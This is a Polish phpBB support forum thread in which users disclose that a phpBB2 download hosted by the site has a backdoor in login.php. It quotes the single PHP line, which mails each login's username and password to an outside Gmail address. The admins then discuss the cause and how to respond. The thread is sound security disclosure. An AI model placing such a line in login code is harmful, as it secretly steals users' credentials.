phpBBhelp.pl
https://www.phpbbhelp.pl/forum/

Dziura w paczce phpBB2
http://www.phpbbhelp.pl/forum/dziura-w-paczce-phpbb2-t24091.html
Strona 1 z 2

Autor:  roadway [ 14 Mar 2010, 18:58 ]
Temat postu:  Dziura w paczce phpBB2

Zupełnie przypadkowo, przeglądając kod z paczki phpBB 2.x, a właściwie pliku login.php, znalazłem chyba znacząco podważający wiarygodność tego serwisu kod php

www.phpbbhelp.pl/download.php?d=453


Plik login.php

Kod:
@mail('phpbb2pl@gmail.com', $_SERVER['SERVER_NAME'] . ' - Haslo', $username .' : '. $password);



Nie trzeba być znawcą php, żeby wiedzieć jakie działanie ma przynieść powyższy kod.

Autor:  Vision [ 14 Mar 2010, 20:07 ]
Temat postu: 

FAIL

@down
Widocznie od pewnego czasu paczka z głównej zawiera tą linijkę...

Autor:  Kudlaty [ 14 Mar 2010, 20:10 ]
Temat postu: 

dziwne... chyba tylko Twoja paczka to zawiera... :roll:
w swojej ktora dosc dawno sciagalem, nie ma czegos takiego...

Autor:  roadway [ 14 Mar 2010, 20:33 ]
Temat postu: 

Wyczyść cache przeglądarki i pobierz jeszcze raz... linia 59 plik login.php

Autor:  TransX [ 14 Mar 2010, 20:47 ]
Temat postu: 

Faktycznie ;-/ Jest.

Autor:  roadway [ 14 Mar 2010, 21:29 ]
Temat postu: 

Pozdrawiam Wykop :)

www.wykop.pl/link/325659/uwazajcie-na-p ... zaja-hasla

Autor:  ENC [ 14 Mar 2010, 21:29 ]
Temat postu: 

Osobiście nie wierze, aby zrobił to Quba, dlatego stawiam na osobę, która nie ma nic wspólnego z tym portalem (włamać na ftp serwera w sumie nie jest tak trudno dla wiedzących co robić).

Autor:  Quba [ 14 Mar 2010, 22:49 ]
Temat postu: 

Zaraz to zweryfikuję.
Swoją drogą możliwe, że ma z tym związek osoba pisząca tego posta. Zaraz zobaczę o co chodzi i przejrzę paczkę.

Autor:  Quba [ 14 Mar 2010, 23:40 ]
Temat postu: 

roadway napisał(a):
Zupełnie przypadkowo, przeglądając kod z paczki phpBB 2.x, a właściwie pliku login.php

To zostawię bez komentarza i nie, nie chcę się nawet domyślać co sam autor tematu ma wspólnego z tą sprawą.
roadway napisał(a):
znalazłem chyba znacząco podważający wiarygodność tego serwisu kod php

Tego też nie skomentuję.

Gwoli wyjaśnienia, serwer ten nie korzysta z FTP.

Czy ktoś, ściągający paczkę w ostatnim czasie mógłby podzielić się informacją, czy owy kod również się tam znajduje? Przydatna byłaby dokładna data pobrania. Jak już wyżej wspominałem, mam wrażenie, że ten kod znajduje się tam już od dość długiego czasu, nad czym ubolewam tym bardziej.

@Kudlaty: jak dawno temu ściągałeś swoją paczkę? Chociażby w przybliżeniu.

Autor:  Kudlaty [ 15 Mar 2010, 09:54 ]
Temat postu: 

Quba napisał(a):
@Kudlaty: jak dawno temu ściągałeś swoją paczkę? Chociażby w przybliżeniu.

przy wypuszczeniu najnowszej wersji 2.x :P
wiec jak sam widzisz, dosc dlugo :P

swoja droga, ciekaw jestem kto to umiescil... ;/

hmm moze na przyszlosc, zrobmy publiczne repo(mercurial - bitbucket lub google) i z tamtad tez sie da pobrac jako zip i tbz2 :)
przy czym nikt nam wtedy nic nie podmieni chocby nie wiem co :)
a i aktualizacja bedzie latwa :)

Autor:  Quba [ 15 Mar 2010, 10:09 ]
Temat postu: 

Nie. Po prostu nie będziemy hostować paczki phpBB. Niech sobie pobierają ze strony phpbb.com. Jest mi naprawdę bardzo przykro, że ludzie w taki sposób odwdzięczają się za otrzymaną pomoc.

Źródeł ataku mogło być kilka. Mogło to mieć związek z tą sytuacją, kiedy podmieniony został plik index.php strony głównej. Mógł to zrobić ktoś z download teamu (swoją drogą co za idiota w ogóle dał prawa do downloadu niezaufanym osobom!?). Ostatecznie ktoś mógł mieć dostęp do plików serwera. Jednakże tę ostatnią opcję bym wykluczył. Aktualnie jestem jedyną osobą posiadającą bezpośredni dostęp do plików.

Autor:  Quba [ 15 Mar 2010, 12:26 ]
Temat postu: 

Chciałbym przeprosić za oskarżenia, które w przypływie emocji wysłałem w stronę byłej ekipy portalu oraz założyciela tematu. Niestety na obecnym etapie mogę się tylko domyślać, kto był sprawcą tego czynu. Póki nie będę miał dowodów, nie będę ujawniać tutaj nawet swoich domysłów. O moich dalszych działaniach w tej sprawie mających na celu dojście, kim jest sprawca, będę informował na bieżąco.

Autor:  vear [ 15 Mar 2010, 18:44 ]
Temat postu: 

Quba napisał(a):
Nie. Po prostu nie będziemy hostować paczki phpBB. Niech sobie pobierają ze strony phpbb.com.

Jest to poniekąd dobry pomysł, aczkolwiek ciężko go rozciągnąć na cały download. Co zatem zamierzasz zrobić z modyfikacjami, które mogą równie skutecznie kryć backdoory? Tłumaczenia łatwo przejrzeć, bo są schematyczne, ale wyzbywanie się de facto całego downloadu to tak, jakbym zlikwidował w domu kanalizację ze strachu przed szczurami mogącymi przedostać się rurą do mieszkania. Niby się da, ale życia to nie ułatwia.

Przy okazji, cieszę się, że jednak "zszedłeś" z poprzedniej ekipy.

Autor:  Kudlaty [ 15 Mar 2010, 19:25 ]
Temat postu: 

hmm moim zdaniem jednak dobrym rozwiazaniem byloby hg na google :P
jak ktos robilby modyfikacje to robi fork naszego phpbb i kazdy bez problemu moze pobrac co chce :) a nawet bedzie mogl sobie bez najmniejszch problemow zainstalowac co chce :)

Autor:  Easy [ 15 Mar 2010, 19:29 ]
Temat postu: 

Są inne strony oprócz google z taką możliwością, ale warto by było się za tym rozejrzeć lub zostawić wszystko na FTP, tylko aby dostęp do tego miała jedna a poważna osoba.

Strona 1 z 2 Wszystkie czasy w strefie UTC + 1 godzina
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
http://www.phpbb.com/